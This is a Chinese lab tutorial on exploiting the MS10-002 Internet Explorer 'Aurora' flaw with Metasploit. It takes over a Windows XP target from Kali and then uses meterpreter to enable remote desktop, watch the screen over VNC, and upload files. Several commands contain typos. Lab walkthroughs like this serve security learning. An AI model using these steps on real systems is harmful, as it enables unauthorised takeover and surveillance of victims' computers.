MS10_002漏洞利用
MS10_002漏洞利用
漏洞披露
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-002
漏洞原理
针对Internet Explorer“极光”内存损坏的攻击
也就是IE浏览器漏洞
影响范围:见上方链接
(之前测试过win7,发现win7各个版本的IE都失败了,xp是成功了,建议以xp做靶机)
漏洞利用
攻击方:192.168.216.139(kali linux)
靶机:192.168.216.141(windows xp)
1.使用MSF框架
设置目标靶机ip地址和端口(端口随便填,只要kali上这个端口未被使用即可)
show opitons
set rhost 192.168.216.141
set roprt 1136
run
如果运行后未显示session(如下图所示),就代表失败
如果成功了就像下图
运行后把目标网址复制到xp的IE浏览器上访问即可看到kali有反馈
接着使用sessions -i即可看到目标主机
使用sessions -1使用即可进入到metetpreter
使用ipconfig即可看到目标主机ip
这样xp系统就被控制了
meterpreter板块
除了ipconfig之外,meterpreter还可以使用很多功能
例如打开VNC(监控软件)
首先需要开启靶机远程桌面
run getgui -e
run vnc
等一会就可以弹出VNC界面
或者使用上传或者下载文件(这里上传kali一个文件到xp)
upload kali目标文件路径 xp要放的文件路径
upload /user/123.txt c:/txt
有关meterpreter暂时先说到这里
还有许多例如端口转发,打开问价等都可以试试
MS10_002漏洞利用相关推荐
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
- 流行漏洞利用工具包瞄准Flash、Java和IE
Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...
- Flash Player漏洞利用Exploiting Flash Reliably
以下消息来自幻影论坛[Ph4nt0m]邮件组 前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...
- 溢出漏洞利用小结(基础)
shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- ASP.net 资源请求漏洞利用工具PadBuster
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...
- S2-045漏洞利用工具解决方案
S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...
- WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
最新文章
- APUE 学习笔记 - Chapter 6. System Data File and Infomation
- SSM项目各层单元测试
- ExtJS 的工具条及菜单
- springmvc+mybatis+dubbo+zookeeper分布式架构
- mysql表还原初始状态_workbench 怎么恢复初始设置
- 【英语学习】【WOTD】sequester 释义/词源/示例
- 3-点的坐标及最远距离问题
- 《异星入境》-超粒方
- python matplot模块
- [转载] python+selenium定时爬取丁香园的新冠病毒每天的数据,并制作出类似的地图(部署到云服务器)
- 485通讯测试软件,Modbus 测试工具| Modbus 通信测试软件
- 数据处理笔记6:缺失值填充
- 从零编写基于MATLAB的GNSS_SDR程序(GNSS软件接收机)——学习记录(2)
- 云计算未来的发展前景和就业前景怎么样?
- E0864vector不是模板
- DXT纹理压缩格式解析
- SQL Server 数据库对象
- Flash视频播放器flowplayer的使用
- Unity - DOTween库的使用问题
- fetch下载文件--统一拦截导出文件